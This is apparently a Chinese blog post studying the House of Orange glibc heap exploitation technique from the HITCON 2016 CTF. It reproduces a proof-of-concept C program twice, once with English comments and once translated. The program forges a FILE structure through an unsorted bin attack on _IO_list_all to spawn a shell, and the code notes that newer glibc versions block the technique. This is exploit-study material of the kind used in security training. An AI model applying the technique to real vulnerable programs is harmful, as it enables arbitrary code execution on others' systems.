参考文章：关于house of orange(unsorted bin attack &&FSOP)的学习总结 - ZikH26 - 博客园 (cnblogs.com)

源码

#define _GNU_SOURCE
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>
#include <sys/syscall.h>

/*
  The House of Orange uses an overflow in the heap to corrupt the _IO_list_all pointer
  It requires a leak of the heap and the libc
  Credit: http://4ngelboy.blogspot.com/2016/10/hitcon-ctf-qual-2016-house-of-orange.html
*/

/*
   This function is just present to emulate the scenario where
   the address of the function system is known.
*/
int winner ( char *ptr);

int main()
{
    /*
      The House of Orange starts with the assumption that a buffer overflow exists on the heap
      using which the Top (also called the Wilderness) chunk can be corrupted.
      
      At the beginning of execution, the entire heap is part of the Top chunk.
      The first allocations are usually pieces of the Top chunk that are broken off to service the request.
      Thus, with every allocation, the Top chunks keeps getting smaller.
      And in a situation where the size of the Top chunk is smaller than the requested value,
      there are two possibilities:
       1) Extend the Top chunk
       2) Mmap a new page

      If the size requested is smaller than 0x21000, then the former is followed.
    */

    char *p1, *p2;
    size_t io_list_all, *top;

    fprintf(stderr, "The attack vector of this technique was removed by changing the behavior of malloc_printerr, "
        "which is no longer calling _IO_flush_all_lockp, in 91e7cf982d0104f0e71770f5ae8e3faf352dea9f (2.26).\n");
  
    fprintf(stderr, "Since glibc 2.24 _IO_FILE vtable are checked against a whitelist breaking this exploit,"
        "https://sourceware.org/git/?p=glibc.git;a=commit;h=db3476aff19b75c4fdefbe65fcd5f0a90588ba51\n");

    /*
      Firstly, lets allocate a chunk on the heap.
    */

    p1 = malloc(0x400-16);

    /*
       The heap is usually allocated with a top chunk of size 0x21000
       Since we've allocate a chunk of size 0x400 already,
       what's left is 0x20c00 with the PREV_INUSE bit set => 0x20c01.

       The heap boundaries are page aligned. Since the Top chunk is the last chunk on the heap,
       it must also be page aligned at the end.

       Also, if a chunk that is adjacent to the Top chunk is to be freed,
       then it gets merged with the Top chunk. So the PREV_INUSE bit of the Top chunk is always set.

       So that means that there are two conditions that must always be true.
        1) Top chunk + size has to be page aligned
        2) Top chunk's prev_inuse bit has to be set.

       We can satisfy both of these conditions if we set the size of the Top chunk to be 0xc00 | PREV_INUSE.
       What's left is 0x20c01

       Now, let's satisfy the conditions
       1) Top chunk + size has to be page aligned
       2) Top chunk's prev_inuse bit has to be set.
    */

    top = (size_t *) ( (char *) p1 + 0x400 - 16);
    top[1] = 0xc01;

    /* 
       Now we request a chunk of size larger than the size of the Top chunk.
       Malloc tries to service this request by extending the Top chunk
       This forces sysmalloc to be invoked.

       In the usual scenario, the heap looks like the following
          |------------|------------|------...----|
          |    chunk   |    chunk   | Top  ...    |
          |------------|------------|------...----|
      heap start                              heap end

       And the new area that gets allocated is contiguous to the old heap end.
       So the new size of the Top chunk is the sum of the old size and the newly allocated size.

       In order to keep track of this change in size, malloc uses a fencepost chunk,
       which is basically a temporary chunk.

       After the size of the Top chunk has been updated, this chunk gets freed.

       In our scenario however, the heap looks like
          |------------|------------|------..--|--...--|---------|
          |    chunk   |    chunk   | Top  ..  |  ...  | new Top |
          |------------|------------|------..--|--...--|---------|
     heap start                            heap end

       In this situation, the new Top will be starting from an address that is adjacent to the heap end.
       So the area between the second chunk and the heap end is unused.
       And the old Top chunk gets freed.
       Since the size of the Top chunk, when it is freed, is larger than the fastbin sizes,
       it gets added to list of unsorted bins.
       Now we request a chunk of size larger than the size of the top chunk.
       This forces sysmalloc to be invoked.
       And ultimately invokes _int_free

       Finally the heap looks like this:
          |------------|------------|------..--|--...--|---------|
          |    chunk   |    chunk   | free ..  |  ...  | new Top |
          |------------|------------|------..--|--...--|---------|
     heap start                                             new heap end



    */

    p2 = malloc(0x1000);
    /*
      Note that the above chunk will be allocated in a different page
      that gets mmapped. It will be placed after the old heap's end

      Now we are left with the old Top chunk that is freed and has been added into the list of unsorted bins


      Here starts phase two of the attack. We assume that we have an overflow into the old
      top chunk so we could overwrite the chunk's size.
      For the second phase we utilize this overflow again to overwrite the fd and bk pointer
      of this chunk in the unsorted bin list.
      There are two common ways to exploit the current state:
        - Get an allocation in an *arbitrary* location by setting the pointers accordingly (requires at least two allocations)
        - Use the unlinking of the chunk for an *where*-controlled write of the
          libc's main_arena unsorted-bin-list. (requires at least one allocation)

      The former attack is pretty straight forward to exploit, so we will only elaborate
      on a variant of the latter, developed by Angelboy in the blog post linked above.

      The attack is pretty stunning, as it exploits the abort call itself, which
      is triggered when the libc detects any bogus state of the heap.
      Whenever abort is triggered, it will flush all the file pointers by calling
      _IO_flush_all_lockp. Eventually, walking through the linked list in
      _IO_list_all and calling _IO_OVERFLOW on them.

      The idea is to overwrite the _IO_list_all pointer with a fake file pointer, whose
      _IO_OVERLOW points to system and whose first 8 bytes are set to '/bin/sh', so
      that calling _IO_OVERFLOW(fp, EOF) translates to system('/bin/sh').
      More about file-pointer exploitation can be found here:
      https://outflux.net/blog/archives/2011/12/22/abusing-the-file-structure/

      The address of the _IO_list_all can be calculated from the fd and bk of the free chunk, as they
      currently point to the libc's main_arena.
    */

    io_list_all = top[2] + 0x9a8;

    /*
      We plan to overwrite the fd and bk pointers of the old top,
      which has now been added to the unsorted bins.

      When malloc tries to satisfy a request by splitting this free chunk
      the value at chunk->bk->fd gets overwritten with the address of the unsorted-bin-list
      in libc's main_arena.

      Note that this overwrite occurs before the sanity check and therefore, will occur in any
      case.

      Here, we require that chunk->bk->fd to be the value of _IO_list_all.
      So, we should set chunk->bk to be _IO_list_all - 16
    */
 
    top[3] = io_list_all - 0x10;

    /*
      At the end, the system function will be invoked with the pointer to this file pointer.
      If we fill the first 8 bytes with /bin/sh, it is equivalent to system(/bin/sh)
    */

    memcpy( ( char *) top, "/bin/sh\x00", 8);

    /*
      The function _IO_flush_all_lockp iterates through the file pointer linked-list
      in _IO_list_all.
      Since we can only overwrite this address with main_arena's unsorted-bin-list,
      the idea is to get control over the memory at the corresponding fd-ptr.
      The address of the next file pointer is located at base_address+0x68.
      This corresponds to smallbin-4, which holds all the smallbins of
      sizes between 90 and 98. For further information about the libc's bin organisation
      see: https://sploitfun.wordpress.com/2015/02/10/understanding-glibc-malloc/

      Since we overflow the old top chunk, we also control it's size field.
      Here it gets a little bit tricky, currently the old top chunk is in the
      unsortedbin list. For each allocation, malloc tries to serve the chunks
      in this list first, therefore, iterates over the list.
      Furthermore, it will sort all non-fitting chunks into the corresponding bins.
      If we set the size to 0x61 (97) (prev_inuse bit has to be set)
      and trigger an non fitting smaller allocation, malloc will sort the old chunk into the
      smallbin-4. Since this bin is currently empty the old top chunk will be the new head,
      therefore, occupying the smallbin[4] location in the main_arena and
      eventually representing the fake file pointer's fd-ptr.

      In addition to sorting, malloc will also perform certain size checks on them,
      so after sorting the old top chunk and following the bogus fd pointer
      to _IO_list_all, it will check the corresponding size field, detect
      that the size is smaller than MINSIZE "size <= 2 * SIZE_SZ"
      and finally triggering the abort call that gets our chain rolling.
      Here is the corresponding code in the libc:
      https://code.woboq.org/userspace/glibc/malloc/malloc.c.html#3717
    */

    top[1] = 0x61;

    /*
      Now comes the part where we satisfy the constraints on the fake file pointer
      required by the function _IO_flush_all_lockp and tested here:
      https://code.woboq.org/userspace/glibc/libio/genops.c.html#813

      We want to satisfy the first condition:
      fp->_mode <= 0 && fp->_IO_write_ptr > fp->_IO_write_base
    */

    FILE *fp = (FILE *) top;


    /*
      1. Set mode to 0: fp->_mode <= 0
    */

    fp->_mode = 0; // top+0xc0


    /*
      2. Set write_base to 2 and write_ptr to 3: fp->_IO_write_ptr > fp->_IO_write_base
    */

    fp->_IO_write_base = (char *) 2; // top+0x20
    fp->_IO_write_ptr = (char *) 3; // top+0x28


    /*
      4) Finally set the jump table to controlled memory and place system there.
      The jump table pointer is right after the FILE struct:
      base_address+sizeof(FILE) = jump_table

         4-a)  _IO_OVERFLOW  calls the ptr at offset 3: jump_table+0x18 == winner
    */

    size_t *jump_table = &top[12]; // controlled memory
    jump_table[3] = (size_t) &winner;
    *(size_t *) ((size_t) fp + sizeof(FILE)) = (size_t) jump_table; // top+0xd8


    /* Finally, trigger the whole chain by calling malloc */
    malloc(10);

   /*
     The libc's error message will be printed to the screen
     But you'll get a shell anyways.
   */

    return 0;
}

int winner(char *ptr)
{ 
    system(ptr);
    syscall(SYS_exit, 0);
    return 0;
}

老样子，翻译一遍源码

#define _GNU_SOURCE
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>
#include <sys/syscall.h>

/*
  House of Orange 通过堆溢出从而破坏_IO_list_all指针
  House of Orange 要求堆地址和libc地址的泄露
  Credit: http://4ngelboy.blogspot.com/2016/10/hitcon-ctf-qual-2016-house-of-orange.html
*/

/*
   winner这个函数仅仅是展现模拟system函数的地址已知的场景
*/
int winner ( char *ptr);

int main()
{
    /*
      House of Orange 首先假设一个堆溢出,使得Top chunk被破坏。
      
      在程序执行的开始, 堆块是Top chunk的一部分.
      第一次的分配通常是Top chunk的一块，是通过服务请求从Top chunk切割下来
      因此每一次的分配Top chunk会随之变得更小
      在Top chunk的大小比我们所申请的堆块小时，就会出现以下两种情况：
       1) 扩大Top chunk
       2) 使用Mmap申请一个新内存

      如果被请求的大小小于0x21000情况,前面的两种可能也是会出现的.
    */

    char *p1, *p2;
    size_t io_list_all, *top;

    fprintf(stderr, "这个技术的攻击模拟下通过malloc_printerr已经被移除了"
        "这表示在91e7cf982d0104f0e71770f5ae8e3faf352dea9f (2.26)后不再调用_IO_flush_all_lockpwhich is no longer calling _IO_flush_all_lockp.\n");
  
    fprintf(stderr, "从glibc2.24中_IO_FILE vtable会被检测用来对付这个exp的白名单"
        "https://sourceware.org/git/?p=glibc.git;a=commit;h=db3476aff19b75c4fdefbe65fcd5f0a90588ba51\n");

    /*
      首先我们先分配一个chunk在堆上.
    */

    p1 = malloc(0x400-16);

    /*
       堆通常被分配一个0x21000大小的top chunk,
       因为我们已经分配了一个0x400大小的堆块
       所以我们剩下0x20c00大小的堆块,包括PREV_INUSE,SIZE被0x20c01

       这个heap的边界是页对齐的.因为Top chunk是heap中的最后一个chunk.
       它必须在末尾是页对齐的

       而且,如果一个与Top chunk在物理地址上相邻的chunk被释放后,它会与Top chunk合并.
       因此Top chunk的PREV_INUSE位总是被设置.

       所以这意味着有两个条件必须一直满足
        1) Top chunk + size 必须页对齐
        2) Top chunk's prev_inuse bit必须被设置

       我们能满足这两个条件如果我们设置Top chunk的size位为0xC00 | PREV_INUSE.
       也就是0x20c01

       现在,让我们满足这两个条件
       1) Top chunk + size has to be page aligned
       2) Top chunk's prev_inuse bit has to be set.
    */

    top = (size_t *) ( (char *) p1 + 0x400 - 16);
    top[1] = 0xc01;

    /* 
       现在我们申请一个堆块大小,这个堆块的size比Top chunk的size位更大的堆块
       Malloc 尝试通过扩展Top chunk的来为这个请求提供服务
       这迫使系统调用被唤醒

       在一般情况下, heap的内存布局很像如下
          |------------|------------|------...----|
          |    chunk   |    chunk   | Top  ...    |
          |------------|------------|------...----|
      heap start                              heap end

       而且一个被分配的新区域对于就的堆块结尾影响不大.
       因此Top chunk新的size位是之前的Top chunk的size位+新分配的size大小

       为了持续追踪size位的改变,malloc使用一个fencepost chunk(这个堆块总的来说是一个暂时的堆块)

       在Top chunk的size位被更新之后,这个fencepost chunk就会被free

       在我们这个场景中,heap的内存布局如下
          |------------|------------|------..--|--...--|---------|
          |    chunk   |    chunk   | Top  ..  |  ...  | new Top |
          |------------|------------|------..--|--...--|---------|
     heap start                            heap end

       在这种情况下, 新的Top将从与之前heap end地址相邻的内存空间开始
       因此在第二个堆块和heap end之间的这个空间是没有被使用的
       这个旧的Top chunk会被free
       因为旧的Top chunk的size比较大,所以当这个旧的Top chunk被释放的时候它的大小会被fastbin的堆块更大
       这个chunk就会被放入unsorted bins中
       现在我们申请一个chunk,这个chunk的size比新的top chunk更大
       这又会发生系统调用，并且最终会调用_int_free

       Finally the heap looks like this:
          |------------|------------|------..--|--...--|---------|
          |    chunk   |    chunk   | free ..  |  ...  | new Top |
          |------------|------------|------..--|--...--|---------|
     heap start                                             new heap end



    */

    p2 = malloc(0x1000);
    /*
      注意: 在chunk的高地址处将会被分配在不同的页中通过mmap调用. 
      它将被放置在旧的heap end之后

      现在我们留下是之前的Top chunk,这个Top chunk被释放并且加入到了unsorted bins中.


      这里开始阶段性的两个攻击. 我们存在一个堆溢出,这个堆溢出能溢出修改old Top chunk
      因此我们能修改chunk的size位
      第二阶段我们再一次利用溢出修改这个在unsorted bin链表的fd和bk指针
      有两个普通的方式利用当前的状态
        - 可以通过设置相应的指针,使得可以申请到任意地址 (要求至少两次申请)
        - 使用chunk的unlink操作使得main_arena中的unsorted bin链表指向可控的位置,并在该位置写入特定数据(要求至少一次		的分配)

      之前的attack是非常直接了当利用,因此我们只详细说明一个第二种利用方式的一个变种.
      这种方式在Angelboy的博客文章(上面有给链接)发现并利用

      这个攻击方式是非常惊人的,因为它的利用是当libc发现堆处于异常状态的时候会触发abort调用.
      无论何时abort被触发, 它都将通过调用_IO_flush_all_lockp刷新文件指针.
      最终, 会遍历链表_IO_list_all并且调用链表中的_IO_OVERFLOW.

      该方法是修改_IO_list_all使其指向我们伪造的文件结构体,
      在这个结构体中_IO_OVERLOW指向system函数并且这个结构体的前八字节要被设置为'/bin/sh',
      以便于调用 _IO_OVERFLOW(fp, EOF)这个函数的时候会执行system('/bin/sh').
      更多关于文件指针的利用能在这篇博客中找到:
      https://outflux.net/blog/archives/2011/12/22/abusing-the-file-structure/

      _IO_list_all的地址可以从free chunk的fd和bk指针计算得到,因为他们当前指向的是libc的main_arena这个地址
    */

    io_list_all = top[2] + 0x9a8;

    /*
      我们计划修改已经被添加到unsorted bins链表中的old top的fd和bk指针

      当malloc尝试满足从free chunk切割堆块的请求时,这个chunk->bk->fd的值会被修改成libc中的main_arena存放unsorted-
      bin链表指针的地址

      注意:修改发生在合理性检查之前,因此这个无论如何都会发生

      这里, 我们要求chunk->bk->fd的值成为_IO_list_all.
      因此, 我们应该设置chunk->bk为_IO_list_all - 16的值
    */
 
    top[3] = io_list_all - 0x10;

    /*
      最后, system函数将被指向该文件指针的指针调用
      如果我们将前8字节填入/bin/sh, 程序就相当于调用system(/bin/sh)
    */

    memcpy( ( char *) top, "/bin/sh\x00", 8);

    /*
      _IO_flush_all_lockp函数会遍历在_IO_list_all中的file指针链表.
      因为我们仅能用main_arena的unsorted-bin链表去修改这个地址.
      这个利用方式可以控制内存中相关的fd-ptr指针.
      下一个文件指针的地址被放在base_address+0x68(即0x68偏移处)
      被修改的文件指针对应于smallbin-4的位置,smallbin-4这个位置保存着90-98字节的smallbin堆块.
      想了解更多关于libc的bins结构请看这个博客:
	  https://sploitfun.wordpress.com/2015/02/10/understanding-glibc-malloc/

      因为我们溢出了old top chunk,我们也就可以控制它的size位.
      这里就有点棘手了, 当前的old chunk是在unsortedbin链表中.
      每次分配的时候, malloc首先尝试将unsortedbin chunk中的堆块提供给用户(切割堆块或者整块拿走),
      因此会遍历unsorted bin这个链表.
      遍历完之后, malloc将分类所有在unsorted bins中non-fitting的堆块,将这些堆块放入相应的bins中.
      如果我们设置堆块的size位为0x61 (prev_inuse 被设置为1)
      并且触发一个比non-fitting的chunk更小的分配(就是调用malloc(),申请一个小于non-fitting chunk的大小),
      malloc将这个old chunk分类进smallbin-4这个堆块中
      因为这个bin当前没有堆块(也就是空的),所以old top chunk将成为新的头结点,
      因此,这个old top chunk的地址会占据位于main_arena中的smallbin[4]这个元素 
      并且最终会被假的文件指针的fd指针取代.

      除了分类之外, malloc也将对smallbin中的chunk进行size位的检查
      因此在对old top chunk分类和同构伪造的指针找到 _IO_list_all之后, 
      malloc将检查相应的位,查看size是否比MINSIZE小(一个宏定义相应的检查为size <= 2 * SIZE_SZ)
      并且最后触发abort函数调用,在调用时就会触发我们的利用链.
      下面一个网址是相应的利用链:
      https://code.woboq.org/userspace/glibc/malloc/malloc.c.html#3717
    */

    top[1] = 0x61;

    /*
      我们来到了下一阶段,这个阶段我们要绕过假文件指针的一些限制
      在函数_IO_flush_all_lockp中会对做这些限制,并且在这里会做检测,相关的源码如下:
      https://code.woboq.org/userspace/glibc/libio/genops.c.html#813

      我们如果想要绕过限制,需要满足的第一个条件如下:We want to satisfy the first condition:
      fp->_mode <= 0 && fp->_IO_write_ptr > fp->_IO_write_base
    */

    FILE *fp = (FILE *) top;


    /*
      1. 设置mode为0: fp->_mode <= 0
    */

    fp->_mode = 0; // top+0xc0


    /*
      2. 设置write_base 为 2 and write_ptr 为 3: fp->_IO_write_ptr > fp->_IO_write_base
    */

    fp->_IO_write_base = (char *) 2; // top+0x20
    fp->_IO_write_ptr = (char *) 3; // top+0x28


    /*
      4) 最后设置这个跳表指向可控的内存,并且放置system函数在那里.
      如下的跳表指针在FILE struct是正确的:
      base_address+sizeof(FILE) = jump_table

         4-a)  _IO_OVERFLOW  calls the ptr at offset 3: jump_table+0x18 == winner
    */

    size_t *jump_table = &top[12]; // controlled memory
    jump_table[3] = (size_t) &winner;
    *(size_t *) ((size_t) fp + sizeof(FILE)) = (size_t) jump_table; // top+0xd8


    /* 最后, 触发整个IO链,通过调用malloc */
    malloc(10);

   /*
     libc'的错误信息将被打印到屏幕上,但是你将有极高的概率getshell(有时会真报错而推出程序).
   */

    return 0;
}

int winner(char *ptr)
{ 
    system(ptr);
    syscall(SYS_exit, 0);
    return 0;
}

利用方式

house_of_orange_level_1

题目来源：hitcon_2016中的house_of_orange
先来检查一下保护机制,发现该题目的附件保护全开

PWN堆house of orange

相关知识

相关IO利用链

Top_chunk_free机制

实验

利用方式

house_of_orange_level_1

总结